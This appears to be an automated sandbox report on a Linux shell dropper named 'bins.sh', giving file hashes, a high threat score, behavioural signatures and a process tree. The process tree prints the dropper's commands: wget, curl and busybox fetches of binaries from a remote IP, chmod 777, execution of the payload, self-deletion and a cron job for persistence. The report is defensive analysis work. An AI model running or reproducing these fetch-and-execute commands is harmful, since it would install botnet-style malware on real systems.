Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    11/12/2024, 19:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    8c689ff7fc20ca3b310ce0077e8f1812

  • SHA1

    8884c1c04d514d14a0ea38c7388594ef699d504d

  • SHA256

    65504742239889b8bc2955de8e775278370a6b357d9cde732b795761a1b80eb8

  • SHA512

    aa45a2b371176bdb114c4c640507c8a43140b835a04175261c44ac8d8fec28f13e729308c26b55ae45dad94335cb51670d34899a571c04f4bf8223772e246767

  • SSDEEP

    192:h3H23fjFxXvHeHzP6nBXPuPrMaDuUxUhUCUfBUtU+RvHeHzJXPuPrR0RUxUhUCUi:h3H23fjFSUBXPuPrMaDuUxUhUCUfBUt0

Score
9/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (2118) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:651
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:654
        • /usr/bin/wget
          wget http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          2⤵
          • Writes file to tmp directory
          PID:658
        • /usr/bin/curl
          curl -O http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:676
        • /bin/busybox
          /bin/busybox wget http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          2⤵
          • Writes file to tmp directory
          PID:683
        • /bin/chmod
          chmod 777 GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          2⤵
          • File and Directory Permissions Modification
          PID:684
        • /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          ./GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:685
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:687
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:688
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:689
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:690
            • /bin/rm
              rm GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
              2⤵
                PID:698
              • /usr/bin/wget
                wget http://37.44.238.68/bins/Q35Esy6cEEsSgdQnvuctrU3mxBWjUnQPlV
                2⤵
                  PID:701

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
                Filesize

                177KB

                MD5

                786d75a158fe731feca3880f436082c0

                SHA1

                79ea2734e43d00cdeabed5586b2c1994d02aef3e

                SHA256

                5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                SHA512

                7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                Download Submit

              • /var/spool/cron/crontabs/tmp.Fr24vp
                Filesize

                210B

                MD5

                0863467c1aa5ffafaebf14f3671161bc

                SHA1

                c57bfe66c06e0caf5c484a360a20fb361b5f9733

                SHA256

                ab86345dd834022555ae5ab3cebb8d1b774dd91343690217bce05da2196994b0

                SHA512

                36f9caa27da3fa40465c050e57400cc1aef5695f94e910568cfeb7653121897ecbfcd01d591ca332417a3f53a5300605dbfe6f9dda45ae036c70624924a8ec6c

                Download Submit